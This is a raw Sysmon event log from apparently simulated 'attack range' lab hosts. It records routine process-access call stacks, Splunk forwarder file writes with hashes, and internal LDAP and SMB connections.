11:27:46.171{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000299417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:46.071{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:46.055{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:47.238{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E517BE3F337B3B5E1BACADBB41CC8731,SHA256=58983707DC24C4D466B0596A5F6747F96E4D18C956273DD295D4D495F9962872,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.686{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5060AAE97785BA30B366C1E6F9872B1B,SHA256=5F2E0012284D22C6551B25A994261EE24CF857CB19E3BDBF21F20F76C0F75C57,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.690{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51776-false10.0.1.12-8000- 10341000x8000000000000000223291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A33-6216-5F05-000000003902}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1A33-6216-5F05-000000003902}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.171{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A33-6216-5F05-000000003902}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:47.172{4F8D34B0-1A33-6216-5F05-000000003902}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:47.217{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FA507E2D8888FD95CE7F702BF2F10CC,SHA256=69137658B1095C1D9B87F7FE5165FD14A53EA82B211D08D770C8E10986997764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:47.201{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E50D18C1F9577A3FC1B8CB4943EBA0C,SHA256=653C4326ACF86D355E9845F2704EFE13613DDB5A76ED91321E9BA67522C63DFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:48.470{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=4E3B9FEFB1A045DFAAFC2E94F51367FB,SHA256=3E056961BB2EA3FB2FF7AB7A79114AC9268DD5434A125D012EC28F8609EF3E60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:48.254{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=115441471969C2F561B423C518C25DC0,SHA256=F3DC969A272FF2DBE4E475A118F3064D38277004D5136307CB22897463F7FD09,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.238{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51777-false10.0.1.12-8089- 23542300x8000000000000000223294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:48.124{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1B2B1FE53A67B0C573CC1DA84B57DD1,SHA256=7841E0FC234844D3F3F0FADE18704930858B21C15E9A28A49C2D0B1EBAC4724C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:45.636{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49614-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000299429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:45.636{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49614-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000299428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:45.541{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49613-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:45.541{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49613-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:45.522{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49612-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:45.521{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49612-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000299434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:49.269{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718833131222A6A85F82C8FF0287F0F7,SHA256=7B59981897F98DB3711CDEF34D80A553C981E9A4EC4AA68D420EE9B80F3AE737,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.936{4F8D34B0-1A35-6216-6105-000000003902}13163532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A35-6216-6105-000000003902}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:49.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 